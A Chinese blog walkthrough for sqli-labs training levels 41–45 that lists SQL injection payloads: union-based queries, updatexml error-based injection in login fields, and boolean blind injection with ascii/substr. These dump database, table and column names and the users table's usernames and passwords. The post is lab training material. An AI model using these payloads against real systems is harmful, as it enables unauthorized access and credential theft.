首页 > 数据库 >sqli-labs靶场通关攻略(41-50)

sqli-labs靶场通关攻略(41-50)

时间:2024-08-28 18:52:47浏览次数:12  
标签:users 50 41 labs --+ login password ascii 1000

Less-41

 步骤一:查看数据库名

?id=-1 union select 1,2,database()--+

步骤二:查看表名

?id=-1 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()--+

步骤三:查看users表中列名

?id=-1 union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='security' and table_name='users' --+

步骤四:查看users表中信息

?id=-1 union select 1,2,group_concat(id,username,password) from users --+

Less-42

步骤一:登陆抓包,发放到重放器

步骤二:查看数据库名

login_user=1'--+&login_password=1000'or updatexml(1,concat(1,(select database())),1)--+

步骤三:查看表名

login_user=1'--+&login_password=1000'or updatexml(1,concat(1,(select group_concat(table_name) from information_schema.tables where table_schema='security')),1)--+

步骤四:查看users表中列名

login_user=1'--+&login_password=1000'or updatexml(1,concat(1,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users')),1)--+

步骤五:查看users表中信息

login_user=1'--+&login_password=1000'or updatexml(1,concat(1,(select group_concat(username,password) from users)),1)--+

Less-43

 步骤一:登陆抓包,发放到重放器

步骤二:查看数据库名

login_user=1')--+&login_password=1000')or updatexml(1,concat(1,(select database())),1)--+

步骤三:查看表名

login_user=1')--+&login_password=1000')or updatexml(1,concat(1,(select group_concat(table_name) from information_schema.tables where table_schema='security')),1)--+

步骤四:查看users表中列名

login_user=1')--+&login_password=1000')or updatexml(1,concat(1,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users')),1)--+

步骤五:查看users表中信息

login_user=1')--+&login_password=1000')or updatexml(1,concat(1,(select group_concat(username,password) from users)),1)--+

Less-44

步骤一:登陆抓包,发放到重放器

步骤二:页面只有ture和flase两种情况,所以需要使用布尔盲注

判断数据库长度大于7 页面图片消失

login_user=1'or 1=1--+&login_password=1000'or length(database())>7--+

判断数据库长度大于8 页面报错 说明数据库长度等于8:

login_user=1'or 1=1--+&login_password=1000'or length(database())>8--+

步骤三:判断数据库的第一个字符

用ascii码截取数据库的第一位字符 判断第一位字符的ascii码是否大于114 页面图片消失
login_user=1'or 1=1--+&login_password=1000'or ascii(substr(database(),1,1))>114--+

判断数据库第一位字符的ascii码是否大于115 页面显示报错  说明第一位字符ascii码等于115

login_user=1'or 1=1--+&login_password=1000'or ascii(substr(database(),1,1))>115--+

数据库第一位字符ascii码为115 's'。

............................最终得出数据库名为security

步骤四:查security数据库中第一张表的第一位字符

login_user=1'or 1=1--+&login_password=1000'or ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))>100--+


login_user=1'or 1=1--+&login_password=1000'or ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))>101--+

大于100不大于101 说明第一张表的第一位字符等于101 'e' 。

................................最终得出第一张表的表名为emails

步骤五:判断users表中第一个字段的第一位字符

login_user=1'or 1=1--+&login_password=1000'or ascii(substr((select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 0,1),1,1))>104--+

login_user=1'or 1=1--+&login_password=1000'or ascii(substr((select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 0,1),1,1))>105--+


说明users表的第一个字段的第一位字符ascii码为105 'i'

............最终得出users表的第一个字段为id

步骤六:判断username列的第一条数据的第一个字符

login_user=1'or 1=1--+&login_password=1000'or ascii(substr((select username from users limit 0,1),1,1))>67--+

login_user=1'or 1=1--+&login_password=1000'or ascii(substr((select username from users limit 0,1),1,1))>68--+

说明users表里面的username字段的第一条数据的第一个字符的ascii码为68'D'

...........最终得出users表里面的username字段的第一条数据为Dumb

Less-45

步骤一:登陆抓包,发放到重放器

步骤二:页面只有ture和flase两种情况,所以需要使用布尔盲注

判断数据库长度大于7 页面图片消失

login_user=1')or 1=1--+&login_password=1000')or length(database())>7--+

判断数据库长度大于8 页面报错 说明数据库长度等于8:

login_user=1')or 1=1--+&login_password=1000')or length(database())>8--+

步骤三:判断数据库的第一个字符

用ascii码截取数据库的第一位字符 判断第一位字符的ascii码是否大于114 页面图片消失
login_user=1')or 1=1--+&login_password=1000')or ascii(substr(database(),1,1))>114--+

判断数据库第一位字符的ascii码是否大于115 页面显示报错  说明第一位字符ascii码等于115

login_user=1')or 1=1--+&login_password=1000')or ascii(substr(database(),1,1))>115--+

数据库第一位字符ascii码为115 's'。

............................最终得出数据库名为security

步骤四:查security数据库中第一张表的第一位字符

login_user=1')or 1=1--+&login_password=1000')or ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))>100--+


login_user=1')or 1=1--+&login_password=1000')or ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))>101--+

大于100不大于101 说明第一张表的第一位字符等于101 'e' 。

................................最终得出第一张表的表名为emails

步骤五:判断users表中第一个字段的第一位字符

login_user=1')or 1=1--+&login_password=1000')or ascii(substr((select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 0,1),1,1))>104--+

login_user=1')or 1=1--+&login_password=1000')or ascii(substr((select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 0,1),1,1))>105--+


说明users表的第一个字段的第一位字符ascii码为105 'i'

............最终得出users表的第一个字段为id

步骤六:判断username列的第一条数据的第一个字符

login_user=1')or 1=1--+&login_password=1000')or ascii(substr((select username from users limit 0,1),1,1))>67--+

login_user=1')or 1=1--+&login_password=1000')or ascii(substr((select username from users limit 0,1),1,1))>68--+

说明users表里面的username字段的第一条数据的第一个字符的ascii码为68'D'

...........最终得出users表里面的username字段的第一条数据为Dumb

标签:users,50,41,labs,--+,login,password,ascii,1000
From: https://blog.csdn.net/shw_yzh/article/details/141636944

相关文章

  • 南沙区信奥赛CSP-J/S 陈老师解题:1350:【例4-11】最短网络(agrinet)
    ​ 【题目描述】农民约翰被选为他们镇的镇长!他其中一个竞选承诺就是在镇上建立起互联网,并连接到所有的农场。当然,他需要你的帮助。约翰已经给他的农场安排了一条高速的网络线路,他想把这条线路共享给其他农场。为了用最小的消费,他想铺设最短的光纤去连接所有的农场。你将得到一......
  • QL5010-16-ASEMI逆变焊机专用整流桥QL5010
    编辑:llQL5010-16-ASEMI逆变焊机专用整流桥QL5010型号:QL5010品牌:ASEMI封装:KBPC-4批号:2024+类型:整流模块电流:50A电压:1600V安装方式:直插式封装特性:大功率、整流桥产品引线数量:4产品内部芯片个数:4产品内部芯片尺寸:MIL工作结温:-40℃~150℃功率:50W包装方式:500/盒:3000/箱......
  • MT5016A-ASEMI无人机专用整流桥MT5016A
    编辑:llMT5016A-ASEMI无人机专用整流桥MT5016A型号:MT5016A品牌:ASEMI封装:D-63批号:2024+分类:整流桥特性:整流方桥、整流桥平均正向整流电流(Id):50A最大反向击穿电压(VRM):1600V恢复时间:>2000ns结温:-55℃~150℃正向峰值电压:1.05V~1.25V引脚数量:5芯片个数:6芯片尺寸:MILMT5016A......
  • 【北京迅为】龙芯iTOP-LS2K0500开发板快速启动手册-第3章 Windows安装串口终端
      LS2K0500采用龙芯2K0500处理器,基于龙芯自主指令系统(LoongArch)架构,片内集成64位LA264处理器核。实现ACPI、DVFS/DPM动态电源功耗管理等低功耗技术,支持多种电源级别和唤醒方式,可根据具体应用场景对芯片部分功能和高速接口进行动态时钟、电源开关控制,满足工控、网......
  • phpinclude-labs做题记录
    Level1file协议payload:?wrappers=/flagLevel2data协议去包含data协议中的内容其实相当于进行了一次远程包含,所以data协议的利用条件需要php.ini中开启allow_url_fopen和allow_url_includeGET:?wrappers=,然后POST:helloctf=system('cat/flag');Level3data......
  • ABC F(500)
    ABCF(*500)ABC364F-RangeConnectMSTProblemStatementThereisagraphwith\(N+Q\)vertices,numbered\(1,2,\ldots,N+Q\).Initially,thegraphhasnoedges.Forthisgraph,performthefollowingoperationfor\(i=1,2,\ldots,Q\)......
  • 洛谷P4163[SCOI2007]排列
    洛谷P4163[SCOI2007]排列题意给一个数字串\(s\)和正整数\(d\),统计\(s\)有多少种不同的排列能被\(d\)整除(可以有前导\(0\))。思路考虑状压dp。\(dp_{S,k}\)表示当前已经选定了\(S\)集合(下标)的数,模\(d=k\)的方案数。状态转移方程:\[dp_{S|2^j,(k\times10+s_j)......
  • sql-labs36-40通关攻略
    第36关一.判断闭合点http://127.0.0.1/Less-36/?id=1%df%20--+http://127.0.0.1/Less-36/?id=1%df%20--+二.查询数据库http://127.0.0.1/Less-36/?id=-1%df%27%20union%20select%201,database(),3--+http://127.0.0.1/Less-36/?id=-1%df%27%20union%20select%201,database(......
  • sqli-labs靶场通关攻略(36-40关)
    第36关(宽字节注入(BypassMySQLRealEscapeString))查数据库?id=-1%df%27%20union%20select%202,database(),3%20--+ 查表?id=-1%df'unionselect1,group_concat(table_name),3frominformation_schema.tableswheretable_schema=database()--+查列?id=-1%df'uni......
  • Day50.HTML前戏
    1.HTML前戏_socket构造出符合HTTP协议格式的数据,并在前端显示数据2.HTML前戏_前端显示的数据设置一级标题3.HTML前戏_从文件中读取前端代码,前端显示的数据设置一级标题4.HTML前戏_设置a标签,添加点击跳转的页面5.HTML前戏_设置img标签,src=图片地址,页面显示图片4.6.HTML前戏_HTM......